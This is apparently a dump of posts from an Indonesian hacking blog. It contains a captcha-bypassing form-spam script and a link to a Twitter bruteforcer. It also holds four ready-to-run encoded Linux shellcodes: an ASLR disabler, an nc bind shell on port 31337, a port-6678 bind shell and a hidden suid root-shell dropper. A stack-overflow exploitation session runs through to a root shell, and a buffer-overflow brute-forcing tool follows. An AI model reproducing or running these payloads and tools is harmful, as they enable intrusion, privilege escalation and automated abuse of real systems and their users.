opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
urllib2.install_opener(opener)
else:
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cj))
ClientCookie.install_opener(opener)
# for example, try a URL that sets a cookie
theurl = 'http://[CENCORED]'
theurl2 = 'http://[CENCORED]'
txdata = None # or, for POST instead of GET, txdata=urrlib.urlencode(somedict)
txheaders = {'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}
try:
req = Request(theurl, txdata, txheaders) # create a request object
handle = urlopen(req).read() # and open it
angka = re.findall("jawab ini : (.*) =", handle)
print angka[0]
count = "printf $((%s))" % (angka[0])
smart = StringIO.StringIO(commands.getstatusoutput(count)[1]).read()
mathguard = re.findall("name='mathguard_code' value='(.*)' />", handle)
params = urllib.urlencode({'Phonenumbers':'02197448206',
'Text':'oppppssss',
'mathguard_answer':smart,
'mathguard_code':mathguard,
'TOMBOL':'KIRIM'})
req = Request(theurl2, params, txheaders) # create a request object
handle = urlopen(req) # and open it
print handle
except IOError, e:
print 'Failed to open "%s".' % theurl
if hasattr(e, 'code'):
print 'Error code: %s.' % e.code
else:
print 'Here are the headers of the page:'
print handle.info( )
# you can also use handle.read( ) to get the page, handle.geturl( ) to get the
# the true URL (could be different from `theurl' if there have been redirects)
if cj is None:
print "Sorry, no cookie jar, can't show you any cookies today"
else:
print 'Here are the cookies received so far:'
for index, cookie in enumerate(cj):
print index, ': ', cookie
cj.save(COOKIEFILE) # save the cookies again
yah seperti manusia cookie dan session tetap ada pada program tersebut sehingga memungkinkan data pada form tersubmit .
Lalu bagaimana cara bypass catpcha tersebut ?
kita bisa menggunakan Optical Carachter Reader (OCR) untuk membaca text yang ada dalam gambar .
Semakin bagus algorithma OCR tersebut mengenal bagaimana catpcha tersebut bekerja maka semakin bagus OCR tersebut mengenali text yang ada pada dalam catpcha dengan baik .
Ok, dari suatu website . saya mendapatkan gambar captcha seperti berikut .
Beruntungnya sudah ada OCR opensource yang telah di develope sebelumnya dan saya menggunakan GOCR
GOCR adalah opensource OCR program yang bisa anda dapatkan di sini http://jocr.sourceforge.net/
Ok berikut demo stand alone captcha di local system dan menggunakan GOCR untuk mengalahkan catpcha tersebut .
gunslinger@localhost:~/python$ gocr security.png 207 gunslinger@localhost:~/python$
captcha berhasil di tembus . namun catpcha berikut adalah catpcha simple . dan hanya sample sederhana experimen saya
Secret : http://caca.zoy.org/wiki/PWNtcha Njoy
twitteater ~ twitter eater
Twitteater, is a bruteforcer, freezer, status update tools .
This using curl for work
I preffer user curl than pycurl because the code will be smaller and faster .
https://sourceforge.net/projects/twitteater/
Sha1checksum : ae5954549026624634b4915fe3b7c0de241dd72a
echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
/*
Title : echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Name : 111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Date : Mon Jul 5 16:58:50 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x57\x80\x44\x0e\xff\x01"
"\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x5f\x30\xbf\x30\xd1\xaf\x0a\x51\x67\x6d\x2e\x72"
"\x67\x67\x2e\x2e\x61\x68\x88\xe2\x51\x67\x2c\x62"
"\x62\x62\x88\xe0\x51\xea\x06\x50\x52\x88\xe0\xcc"
"\x7f\x60\xe7\xf3\xfe\xfe\xfe\x64\x62\x67\x6e\x1f"
"\x2f\x1f\x3d\x1f\x2e\x6f\x71\x6e\x62\x2e\x72\x78"
"\x72\x2e\x6a\x64\x71\x6d\x64\x6b\x2e\x71\x60\x6d"
"\x63\x6e\x6c\x68\x79\x64\x5e\x75\x60\x5e\x72\x6f"
"\x60\x62\x64";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
/*
Title : nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
Name : 91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
Date : Mon Jul 5 16:58:50 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
"\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
"\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
"\xb5\x96\x1d\x29\x34\x34\x34\xa3\x98\x55\x62\xa1\xa5\x55\x68"
"\x66\x68\x68\x6c\x55\x62\x9a\x55\x64\x97\x9e\xa3\x64\x64\xa8"
"\x9d";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
bind port to 6678 XOR encoded polymorphic linux shellcode .
/*
Title : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date : Tue Jul 6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff"
"\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff"
"\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b"
"\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83"
"\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a"
"\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58"
"\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58"
"\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9"
"\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a"
"\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62"
"\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb"
"\xba\x01\xc7\x8a";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
161 bytes Drop suid shell root in /tmp/.hiddenshell linux polymorphic shellcode
/*
Title : Drop suid root shell in /tmp/.hiddenshell linux polymorphic shellcode .
Name : 161 bytes Drop suid shell root in /tmp/.hiddenshell linux polymorphic shellcode
Date : Sat Jun 17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x89\x80\x6c\x0e\xff\x35\x80\xe9\x01"
"\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
"\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
"\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
"\xb5\x96\x1d\x29\x34\x34\x34\x98\xa5\x55\x64\x97\x9e\xa3\x64"
"\x64\xa8\x9d\x55\x64\xa9\xa2\xa5\x64\x63\x9d\x9e\x99\x99\x9a"
"\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d\xa4\xac\xa3\x55\xa7"
"\xa4\xa4\xa9\x6f\xa7\xa4\xa4\xa9\x55\x64\xa9\xa2\xa5\x64\x63"
"\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d"
"\xa2\xa4\x99\x55\x69\x6c\x6a\x6a\x55\x64\xa9\xa2\xa5\x64\x63"
"\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
play with ron.c
i found in internet about this source .
but exploitation trick is about oldstyle, so it’s useless .
so i’ve been challenged in .
play with ron.c
gunslinger@localhost:~/bof$ vim ron.c
gunslinger@localhost:~/bof$ cat ron.c
/**
* Name: StackVuln.c
* Author: Ron Bowes
* Date: March 24, 2004
* To compile: gcc StackVuln.c -o StackVuln
* Requires: n/a
*
* Purpose: This code is vulnerable to a stack overflow if more than
* 20 characters are entered. The exploit for it was written by
* Jon Erickson in Hacking: Art of exploitation, but I wrote
* this vulnerable code independently.
*/
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char string[40];
strcpy(string, argv[1]);
printf("The message was: %s\n", string);
printf("Program completed normally!\n\n");
return 0;
}
gunslinger@localhost:~/bof$ gcc -g -fno-stack-protector -mpreferred-stack-boundary=2 -o ron ron.c
gunslinger@localhost:~/bof$ sudo chown root:root ron
[sudo] password for gunslinger:
gunslinger@localhost:~/bof$ sudo chmod 4755 ron
gunslinger@localhost:~/bof$ ./ron
Segmentation fault
gunslinger@localhost:~/bof$ ./ron a
The message was: a
Program completed normally!
gunslinger@localhost:~/bof$ ./bufferbruteforce.py -a /home/gunslinger/bof/ron -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' [Ok]
[*] Checking null on randomize_va_space [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 40 byte(s)
[!] Application got segmentation fault by giving 40 byte(s) into buffer !!
gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 39'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
gunslinger@localhost:~/bof$ ./ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Segmentation fault
gunslinger@localhost:~/bof$ gdb -q ron
(gdb) list
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
(gdb) run `perl -e 'print "A" x 400'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 400'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) run `perl -e 'print "A" x 40'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 40'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 41'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 41'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 42'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 42'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 43'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 43'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program exited normally.
(gdb) run `perl -e 'print "A" x 44'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 44'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7e7b703 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 45'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 45'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7e70042 in ?? () from /lib/tls/i686/cmov/libc.so.6
(gdb) run `perl -e 'print "A" x 46'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 46'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0xb7004141 in ?? ()
(gdb) run `perl -e 'print "A" x 47'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 47'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run `perl -e 'print "A" x 48'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "A" x 48'`
The message was: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program completed normally!
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax 0x0 0
ecx 0x1d 29
edx 0xb7fc50d0 -1208201008
ebx 0xb7fc3ff4 -1208205324
esp 0xbffff4d0 0xbffff4d0
ebp 0x41414141 0x41414141
esi 0x8048480 134513792
edi 0x8048370 134513520
eip 0x41414141 0x41414141
eflags 0x10246 [ PF ZF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) list
19 printf("The message was: %s\n", string);
20 printf("Program completed normally!\n\n");
21 return 0;
22 }
23
(gdb) list 1
1 /**
2 * Name: StackVuln.c
3 * Author: Ron Bowes
4 * Date: March 24, 2004
5 * To compile: gcc StackVuln.c -o StackVuln
6 * Requires: n/a
7 *
8 * Purpose: This code is vulnerable to a stack overflow if more than
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list 2
1 /**
2 * Name: StackVuln.c
3 * Author: Ron Bowes
4 * Date: March 24, 2004
5 * To compile: gcc StackVuln.c -o StackVuln
6 * Requires: n/a
7 *
8 * Purpose: This code is vulnerable to a stack overflow if more than
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
(gdb) list
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
19 printf("The message was: %s\n", string);
20 printf("Program completed normally!\n\n");
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run test to see where esp is
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron test to see where esp is
Breakpoint 1, main (argc=7, argv=0xbffff544) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) i r esp
esp 0xbffff488 0xbffff488
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
�Rh//shh/bin��RS��̀\���\���\���
Program completed normally!
Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) shell su
Password:
root@localhost:/home/gunslinger/bof# gdb -q bof
(gdb) Quit
(gdb) quit
root@localhost:/home/gunslinger/bof# gdb -q ron
(gdb) list
9 * 20 characters are entered. The exploit for it was written by
10 * Jon Erickson in Hacking: Art of exploitation, but I wrote
11 * this vulnerable code independently.
12 */
13 #include <stdio.h>
14 #include <string.h>
15 int main(int argc, char *argv[])
16 {
17 char string[40];
18 strcpy(string, argv[1]);
(gdb) b 18
Breakpoint 1 at 0x804842a: file ron.c, line 18.
(gdb) run `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Starting program: /home/gunslinger/bof/ron `perl -e 'print "\x90" x 8 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "\x5c\xf3\xff\xbf" x 3'`
Breakpoint 1, main (argc=2, argv=0xbffff554) at ron.c:18
18 strcpy(string, argv[1]);
(gdb) continue
Continuing.
The message was: ���������1�̀�
�Rh//shh/bin��RS��̀\���\���\���
Program completed normally!
Program received signal SIGILL, Illegal instruction.
0xbffff35e in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
root@localhost:/home/gunslinger/bof# q
bash: q: command not found
root@localhost:/home/gunslinger/bof# echo -ne "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\x68\x78\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5" > shellcode3.bin
root@localhost:/home/gunslinger/bof# export PAYLOAD=$(perl -e 'print "\x90" x 200')$(cat shellcode.bin)
root@localhost:/home/gunslinger/bof# getenv
bash: getenv: command not found
root@localhost:/home/gunslinger/bof# ./getenv
bash: ./getenv: No such file or directory
root@localhost:/home/gunslinger/bof# ls
bbf.py bof1 bof2.c bof.c bufferbruteforce.py displant.c easy.c get_env man-pages ron shellcode.bin smashme2 vanish.c
bf2.py bof1.c bof3 brute core easy2 expl get_env.c objdasm.vim ron.c shellcode.c smashme2.c
bof bof2 bof3.c brute.c displant easy2.c expl.c hts passwd.php shellcode3.bin smashme smashme.c
root@localhost:/home/gunslinger/bof# ./get_env
Segmentation fault
root@localhost:/home/gunslinger/bof# ./get_env PAYLOAD
PAYLOAD is at 0xbffffe78
root@localhost:/home/gunslinger/bof# printf "%x\n" $((0xbffffe78 + 100))
bffffedc
root@localhost:/home/gunslinger/bof# \xdc\xfe\xff\xbf
bash: xdcxfexffxbf: command not found
root@localhost:/home/gunslinger/bof# /bof2 $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
bash: /bof2: No such file or directory
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2. "\xdc\xfe\xff\xbf" x 10')
String found where operator expected at -e line 1, near "2. "\xdc\xfe\xff\xbf""
(Missing operator before "\xdc\xfe\xff\xbf"?)
Number found where operator expected at -e line 1, near "x 10"
(Do you need to predeclare x?)
syntax error at -e line 1, near "2. "\xdc\xfe\xff\xbf""
Execution of -e aborted due to compilation errors.
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 2 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 3 . "\xdc\xfe\xff\xbf" x 10')
The message was: �������������������������������������������
Program completed normally!
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 4 . "\xdc\xfe\xff\xbf" x 10')
The message was: ��������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 5 . "\xdc\xfe\xff\xbf" x 10')
The message was: ���������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 6 . "\xdc\xfe\xff\xbf" x 10')
The message was: ����������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 7 . "\xdc\xfe\xff\xbf" x 10')
The message was: �����������������������������������������������
Program completed normally!
Segmentation fault
root@localhost:/home/gunslinger/bof# ./ron $(perl -e 'print "\x90" x 8 . "\xdc\xfe\xff\xbf" x 10')
The message was: ������������������������������������������������
Program completed normally!
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# uname -a
Linux localhost 2.6.28-11-generic #42-Ubuntu SMP Fri Apr 17 01:57:59 UTC 2009 i686 GNU/Linux
# echo GAMEOVER
GAMEOVER
# exit
root@localhost:/home/gunslinger/bof#
bufferbruteforce.py
This is buffer brute force for test buffer overflow program
#!/usr/bin/python
import sys, time, StringIO, commands, re, os, os.path
'''
This is buffer brute forcer program, allow you to brute forcing buffer and know how bytes to make got Segmentation fault .
Written for educational purpose and pentest only. Use it at your own risk .
Toolname : bufferbruteforce.py
Author : gunslinger_ <yudha.gunslinger@gmail.com>
date : Sun Jul 4 00:58:54 WIT 2010
You can use this simple bof.c for testing .
-----------------bof.c-----------------
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[400];
strcpy(buffer, argv[1]);
return 0;
}
------------------EOF------------------
Example usage :
root@localhost:/home/gunslinger/bof# cat bof.c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[400];
strcpy(buffer, argv[1]);
return 0;
}
root@localhost:/home/gunslinger/bof# echo 0 > /proc/sys/kernel/randomize_va_space
root@localhost:/home/gunslinger/bof# gcc -o bof -g -fno-stack-protector -mpreferred-stack-boundary=2 bof.c
root@localhost:/home/gunslinger/bof# exit
gunslinger@localhost:~/bof$ ./bbf.py -a /home/gunslinger/bof/bof -s 1 -e 500
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>
[*] Checking Existing application [Ok]
[*] Checking '/proc/sys/kernel/randomize_va_space' [Ok]
[*] Checking null on randomize_va_space [Ok]
[*] Checking perl [Ok]
[*] Preparing for bruteforcing buffer [Ok]
[*] buffering on 404 byte(s)
[!] Application got segmentation fault by giving 404 byte(s) into buffer !!
gunslinger@localhost:~/bof$
'''
'''define color'''
green = '\033[38m'
red = '\033[31m'
reset = '\033[0;0m'
name = sys.argv[0]
fail = "[Failure]"
ok = "[Ok]"
rvs = '/proc/sys/kernel/randomize_va_space'
face = '''
Buffer brute force
Programmer : gunslinger_ <yudha.gunslinger@gmail.com>'''
option = '''
Usage: %s [options]
Options: -a, --application <path-to-application> | Target application for bruteforcing buffer
-s, --start <int> | start byte for bruteforcing buffer
-e, --end <int> | end byte for bruteforcing buffer
-h, --help <help> | print this help
Example: %s -a /home/gunslinger/bufferoverflow/bof -s 0 -e 500
''' % (name,name)
def myface() :
print face
def helpMe() :
myface()
print option
sys.exit(1)
for arg in sys.argv:
if arg.lower() == '-a' or arg.lower() == '--application':
app = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-s' or arg.lower() == '--start':
counter = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-e' or arg.lower() == '--end':
end = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
helpMe()
elif len(sys.argv) <= 1:
helpMe()
def checkingexistingfile():
if os.path.exists(app):
exfile = green+ok
else:
exfile = red+fail
time.sleep(1)
print "\n[*] Checking Existing application \t\t\t\t\t%s%s" % (exfile, reset)
if exfile == red+fail:
print "[*] Please checking your application target path"
exit()
def checkrandomize():
if os.path.exists(rvs):
exrvs = green+ok
else:
exrvs = red+fail
time.sleep(1)
print "[*] Checking \'/proc/sys/kernel/randomize_va_space\' \t\t\t%s%s" % (exrvs, reset)
if exrvs == red+fail:
quit()
cat = "cat "+rvs
result = StringIO.StringIO(commands.getstatusoutput(cat)[1]).read()
null = re.findall("0", result)
time.sleep(1)
if null:
print "[*] Checking null on randomize_va_space \t\t\t\t%s%s%s" % (green, ok, reset)
time.sleep(1)
else:
print "[*] Checking null on randomize_va_space \t\t\t\t%s%s%s" % (red, fail, reset)
print "[*] Please giving null on randomize_va_space by echo 0 > /proc/sys/kernel/randomize_va_space"
exit()
def checkperl():
perl = "perl -e \'print \"A\" x 1\'"
result = StringIO.StringIO(commands.getstatusoutput(perl)[1]).read()
A = re.findall("A", result)
if A:
print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (green, ok, reset)
time.sleep(1)
else:
print "[*] Checking perl \t\t\t\t\t\t\t%s%s%s" % (red, fail, reset)
print "[*] Are perl installed on your system ?"
exit()
def bruteforcebuff():
global counter
print "[*] Preparing for bruteforcing buffer \t\t\t\t\t%s%s%s" % (green, ok, reset)
time.sleep(1)
while counter <= end :
try:
sys.stdout.write("\r[*] buffering on %s%d%s byte(s)" % (red,int(counter),reset))
sys.stdout.flush()
args = app+' '+'`perl -e \'print "A" x '+repr(counter)+'\'`'
SIGSEGV = StringIO.StringIO(commands.getstatusoutput(args)[0]).read()
segmentation_fault = re.findall("35584", SIGSEGV)
if segmentation_fault:
print "\n[!] Application got segmentation fault by giving %s%d%s byte(s) into buffer !!\n" % (red, int(counter), reset)
break
counter = int(counter) + 1
except KeyboardInterrupt:
print "\n[-] Exiting %s" % (name)
sys.exit(1)
def main():
myface()
checkingexistingfile()
checkrandomize()
checkperl()
bruteforcebuff()
if __name__ == '__main__':
main()
fbruteforcer.py
